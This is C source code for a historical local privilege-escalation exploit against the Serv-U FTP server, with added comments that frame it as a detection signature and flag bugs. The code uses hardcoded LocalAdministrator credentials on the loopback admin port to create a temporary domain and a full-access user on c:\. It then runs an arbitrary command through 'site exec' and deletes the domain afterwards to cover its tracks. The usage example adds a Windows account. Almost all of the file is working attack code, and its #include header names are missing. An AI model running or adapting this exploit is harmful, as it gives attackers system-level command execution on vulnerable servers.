/*
 * Historical proof-of-concept against the Serv-U FTP server's local
 * administration port (the program's own banner says "Serv-u >3.x Local
 * Exploit"). What the code below visibly does: connect to 127.0.0.1 on the
 * port given as argv[1], log in with the fixed USER/PASSWORD pair defined
 * below, send SITE MAINTENANCE, create a domain on port 2121 and a user with
 * Access=c:\|RWAMELCDP in it, log into that domain and send
 * "site exec <argv[2]>", then delete the domain and quit.
 *
 * Defensive relevance: the exchange is a compact detection signature for
 * host/network monitoring on the server side -- a loopback connection to the
 * administration port, SITE MAINTENANCE, -SETDOMAIN / -SETUSERSETUP with a
 * root-of-drive Access line, SITE EXEC on the new domain's port, and a
 * -DELETEDOMAIN shortly afterwards. Mitigation is on the server (no
 * fixed-credential maintenance account reachable over a socket; restrict the
 * administration listener), not in this file.
 *
 * This listing was recovered from a page that collapsed the file onto a few
 * lines; the header names of the #include directives were lost in extraction
 * and are left blank rather than guessed.
 */
#pragma comment(lib,"ws2_32.lib")
#include
#include
#include
#include
#include

//Responses -- reply prefixes/substrings that ParseCommands() waits for.
#define BANNER "220 "
#define USEROK "331 User name okay"
#define PASSOK "230 User logged in, proceed."
#define ADMOK "230-Switching to SYSTEM MAINTENANCE mode."   // not referenced in this file; main() waits for "230 " instead
#define DOMAINID "200-DomainID="                              // reply that carries the id of the created domain
//Commands -- FTP commands sent as-is (CRLF terminated).
#define XPLUSER "USER xl\r\n"          // login to the temporary domain created below
#define XPLPASSWORD "PASS 111111\r\n"
#define USER "USER LocalAdministrator\r\n"   // fixed credentials for the administration port
#define PASSWORD "PASS #l@$ak#.lk;0@P\r\n"
#define MAINTENANCE "SITE MAINTENANCE\r\n"
#define EXIT "QUIT\r\n"

// Maintenance-mode request: a new domain "xl" bound to 0.0.0.0:2121.
// Lines starting with '-' continue the request; the line starting with ' ' ends it.
char newdomain[]="-SETDOMAIN\r\n"
"-Domain=xl|0.0.0.0|2121|-1|1|0\r\n"
"-TZOEnable=0\r\n"
" TZOKey=\r\n";
/*
"-DynDNSEnable=0\r\n"
" DynIPName=\r\n";
*/
// Maintenance-mode request: remove the domain again (cleanup at the end of main()).
char deldomain[]="-DELETEDOMAIN\r\n"
"-IP=0.0.0.0\r\n"
" PortNo=2121\r\n";
// Maintenance-mode request: user "xl" in the new domain, home directory c:\,
// full access rights on c:\ and Maintenance=System.
char newuser[] = "-SETUSERSETUP\r\n"
"-IP=0.0.0.0\r\n"
"-PortNo=2121\r\n"
"-User=xl\r\n"
"-Password=111111\r\n"
"-HomeDir=c:\\\r\n"
"-LoginMesFile=\r\n"
"-Disable=0\r\n"
"-RelPaths=1\r\n"
"-NeedSecure=0\r\n"
"-HideHidden=0\r\n"
"-AlwaysAllowLogin=0\r\n"
"-ChangePassword=0\r\n"
"-QuotaEnable=0\r\n"
"-MaxUsersLoginPerIP=-1\r\n"
"-SpeedLimitUp=0\r\n"
"-SpeedLimitDown=0\r\n"
"-MaxNrUsers=-1\r\n"
"-IdleTimeOut=600\r\n"
"-SessionTimeOut=-1\r\n"
"-Expire=0\r\n"
"-RatioUp=1\r\n"
"-RatioDown=1\r\n"
"-RatiosCredit=0\r\n"
"-QuotaCurrent=0\r\n"
"-QuotaMaximum=0\r\n"
"-Maintenance=System\r\n"
"-PasswordType=Regular\r\n"
"-Ratios=None\r\n"
" Access=c:\\|RWAMELCDP\r\n";

#define localip "127.0.0.1"   // both connections are loopback only

// Shared receive buffer and state; every recv() in this file writes into cadena.
char cadena[1024];
int rec,domain;   // rec: last recv() result; domain: id parsed from a DOMAINID reply

/******************************************************************************/
/*
 * Send one command and read replies until one containing `response` arrives.
 *   sock           connected socket
 *   data           NUL-terminated command text, sent verbatim
 *   ShowSend       non-zero: echo the command to stdout with a '>' prefix
 *   showResponses  non-zero: echo each reply to stdout with a '<' prefix
 *   response       substring that ends the read loop (matched with strstr)
 * Side effects: overwrites the globals cadena and rec; when a reply begins
 * with DOMAINID, the integer following it is stored in the global `domain`.
 * Returns early (without printing the separator) when recv() reports 0 or
 * an error.
 * NOTE(review): cadena[rec]='\0' is executed before the rec<=0 check, so an
 * error result (-1) writes to cadena[-1], and a reply that fills all 1024
 * bytes writes to cadena[1024]; both are out-of-bounds writes in this
 * program. Also, because the loop matches `response` anywhere in the buffer
 * with strstr, a multi-line reply that merely mentions the text ends it.
 */
void ParseCommands(int sock, char *data, int ShowSend, int showResponses, char *response)
{
    send(sock,data,strlen(data),0);
    if (ShowSend) printf(">%s",data);
    Sleep(100);   // Win32 Sleep: give the server time to answer before the first recv()
    do {
        rec=recv(sock,cadena,sizeof(cadena),0);
        cadena[rec]='\0';   // see NOTE(review) above: unchecked index
        if (rec<=0) return;
        if (showResponses) printf("<%s",cadena);
        // The server reports the id of a freshly created domain as "200-DomainID=<n>".
        if (strncmp(cadena, DOMAINID,strlen(DOMAINID))==0)
            domain=atoi(cadena+strlen(DOMAINID));
    //} while (strncmp(cadena,response,strlen(response))!=0);
    }
    while (strstr(cadena,response)==NULL);
    printf("******************************************************\r\n");
}

/******************************************************************************/
/*
 * Entry point.  argv[1] = administration port on 127.0.0.1, argv[2] = text
 * passed verbatim after "site exec " on the temporary domain.
 * Returns 0 in every case, including the usage message; exits with 0 on
 * WSAStartup() failure.
 * NOTE(review): connect() results are never checked, so on a refused
 * connection the program proceeds to recv()/send() on an unconnected
 * socket; rec is then -1 and cadena[rec] is the same out-of-bounds write
 * noted in ParseCommands().  sprintf() into the 1024-byte global cadena
 * with argv[2] is unbounded, so a long argument overflows the tool's own
 * buffer.  argv[1] is parsed with strtoul() without an end-pointer or
 * errno check.
 */
int main(int argc, char* argv[])
{
    WSADATA ws;
    int sock,sock2;
    struct sockaddr_in su;    // administration port (argv[1]) on loopback
    struct sockaddr_in xpl;   // the temporary domain on loopback:2121
    printf("Serv-u >3.x Local Exploit by xiaolu\r\n\r\n");
    if (argc<3) {
        printf("USAGE: serv-u.exe port \"command\"\r\n");
        printf("Example: serv-u.exe 43958 \"net user xl xiaoxue /add\"");
        return(0);
    }
    if (WSAStartup( MAKEWORD(2,2), &ws )!=0) {
        printf(" [-] WSAStartup() error\n");
        exit(0);
    }

    // Step 1: administrative session on the port given as argv[1].
    su.sin_family = AF_INET;
    su.sin_port = htons(strtoul(argv[1],NULL,10));
    su.sin_addr.s_addr = inet_addr(localip);
    sock=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
    connect(sock,( struct sockaddr *)&su,sizeof(su));   // NOTE(review): return value ignored
    rec=recv(sock,cadena,sizeof(cadena),0);              // consume the greeting
    cadena[rec]='\0';
    printf("<%s",cadena);
    ParseCommands(sock,USER,1,1,USEROK);
    ParseCommands(sock,PASSWORD,1,1,PASSOK);
    ParseCommands(sock,MAINTENANCE,1,0,"230 ");          // waits for any "230 " line, not ADMOK

    // Step 2: create the throw-away domain; ParseCommands() stores its id in `domain`.
    printf("[+] Creating New Domain...\r\n");
    ParseCommands(sock,newdomain,0,1,BANNER);
    printf("[+] Domain xl:%i Created\n",domain);
    /* Only for v5.x
    printf("[+] Setting New Domain Online\r\n");
    sprintf(cadena,"-SERVERCOMMAND\r\n-ID=%i\r\n Command=DomainOnline\r\n",domain);
    ParseCommands(sock,cadena,0,1,BANNER);
    */

    // Step 3: create the user inside that domain and let the server apply it.
    printf("[+] Creating Evil User\r\n");
    ParseCommands(sock,newuser,0,1,"200 ");
    Sleep(1000);

    // Step 4: second session against the new domain on port 2121.
    printf("[+] Now Exploiting...\r\n");
    xpl.sin_family = AF_INET;
    xpl.sin_port = htons(2121);
    xpl.sin_addr.s_addr = inet_addr(localip);
    sock2=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
    connect(sock2,( struct sockaddr *)&xpl,sizeof(xpl)); // NOTE(review): return value ignored
    rec=recv(sock2,cadena,sizeof(cadena),0);             // consume the greeting
    cadena[rec]='\0';
    ParseCommands(sock2,XPLUSER,1,1,USEROK);
    ParseCommands(sock2,XPLPASSWORD,1,1,PASSOK);
    printf("[+] Now Executing: %s\r\n",argv[2]);
    sprintf(cadena,"site exec %s\r\n",argv[2]);          // NOTE(review): unbounded write into cadena[1024]
    send(sock2,cadena,strlen(cadena),0);                 // reply is not read; the socket is shut down next
    shutdown(sock2,SD_BOTH);
    Sleep(100);

    // Step 5: cleanup -- remove the domain on the administrative session and quit.
    // (Only the domain is deleted; note for responders that the server's own
    //  logs of the maintenance requests above are the remaining trace.)
    ParseCommands(sock,deldomain,0,1,BANNER);
    send(sock,EXIT,strlen(EXIT),0);
    shutdown(sock,SD_BOTH);
    closesocket(sock);
    closesocket(sock2);
    return 0;
}